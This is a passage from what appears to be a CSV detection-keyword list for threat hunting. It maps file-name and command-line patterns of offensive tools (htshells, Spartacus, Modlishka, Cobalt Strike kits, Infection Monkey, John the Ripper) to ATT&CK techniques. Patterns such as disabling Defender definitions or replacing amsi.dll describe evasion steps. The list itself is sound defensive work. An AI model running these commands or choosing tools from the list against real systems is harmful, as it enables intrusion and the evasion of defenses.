Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*mod_perl.embperl.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_perl.IPP.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_perl.Mason.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_perl.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_php.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_php.shell2.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_php.stealth-shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_python.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_rivet.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_ruby.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_sendmail.rce.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_shellshock.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*mod_wp_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*modDetective*","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*--mode com --acl --csv *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode com --procmon *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode dll --existing --pml *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode dll --procmon *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode proxy --action prototypes --path *prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode proxy --dll *.dll*--external-resources*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode proxy --ghidra *--dll *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*ModifiedVulnerableBinaryFormatters\info.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Modlishka/config*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*MODLISHKA_BIN*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-linux-amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-windows-*-amd64.exe*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*modprobe -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe --remove*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe rmmod -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*module inject *","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*modules*daclread.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*modules/enumrate.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*modules/exploits/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*modules/exploits/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*mogwailabs*","offensive_tool_keyword","Github Username","MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo hosting offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mogwailabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*mojo.5688.8052.183894939787088877##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*mojo.5688.8052.35780273329370473##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*mojo_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*monero2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*money2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mongodb2john.js*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Monkey Island v*_windows.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey*tunnel.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey\infection_monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey_island.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey32.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey64.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-linux-32*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-linux-64*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-windows-32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-windows-64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monoxgas/sRDI*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*moonD4rk/HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" +"*MooseDojo*","offensive_tool_keyword","Github Username","github repo that was hosting exploitation tools. may be used by other exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/MooseDojo","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*morphHTA*","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","6","503","142","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z" +"*mortar-main.zip*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*mosquitto2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Mount-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*mousejack*","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch/mousejack","1","1","N/A","N/A","10","1203","255","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z" +"*mouseshaker.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*","greyware_tool_keyword","movefile64.exe","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" +"*MoveKit-master.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*move-msbuild * http move.csproj*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*move-pre-custom-file *.exe *","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*movfuscator*","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","8640","392","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z" +"*Mozilla/5.0 (*-bit) dnstwist*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"*mozilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mozlz4-win32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*mpcaainmfjjigeicjnlkdfajbioopjko*","greyware_tool_keyword","VPN Unlimited Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*MpCmdRun.exe -RemoveDefinitions -All*","greyware_tool_keyword","MpCmdRun","Wipe currently stored definitions","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*MpCmdRun.exe* -disable*","greyware_tool_keyword","MpCmdRun","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive 